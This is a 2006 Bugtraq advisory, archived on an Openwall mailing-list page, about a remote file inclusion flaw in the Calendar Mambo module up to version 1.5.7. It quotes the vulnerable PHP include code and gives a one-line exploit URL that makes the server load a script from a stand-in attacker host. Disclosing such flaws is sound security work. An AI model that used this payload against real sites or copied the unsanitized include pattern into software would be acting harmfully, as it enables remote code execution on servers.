lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060717064055.8534.qmail@securityfocus.com>
Date: 17 Jul 2006 06:40:55 -0000
From: matdhule@...il.com
To: bugtraq@...urityfocus.com
Subject: Calendar Mambo Module <= 1.5.7 Remote File Include Vulnerabilities

---------------------------------------------------------------------------------
Calendar Mambo Module <= 1.5.7 Remote File Include Vulnerabilities
---------------------------------------------------------------------------------

Author : Matdhule

Contact : matdhule@...il.com

Web	: http://www.solpotcrew.org/adv/matdhule-adv-calendar.txt

Application : Calendar Module (com_calendar.php)

Version : 1.5.7 and prior

---------------------------------------------------------------------------------

Vulnerability:

In folder components we found vulnerability script com_calendar.php.

-----------------------com_calendar.php---------------------------------
<?php

//Configuration
include($absolute_path.'/components/calendar/cal_config.php');
if (!file_exists("language/calendar/".$lang."_calendar.php") ) { 
    die("Invalid Language");
} else { 
    include($absolute_path.'/language/calendar/'.$lang.'_calendar.php');
} 

-------------------------------------------------------------------------

Variables $absolute_path are not properly sanitized. When register_globals=on
and allow_fopenurl=on an attacker can exploit this vulnerability with a
simple php injection script.
---------------------------------------------------------------------------------

Exploit :

http://[target]/[path]/components/com_calendar.php?absolute_path=http://attacker.com/evil.txt?

---------------------------------------------------------------------------------

Greetz : solpot, j4mbi_h4ck3r, h4ntu, the_day, phoux, bius, thama & all crews #mardongan, #e-c-h-o, #jambihackerlink @dalnet

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ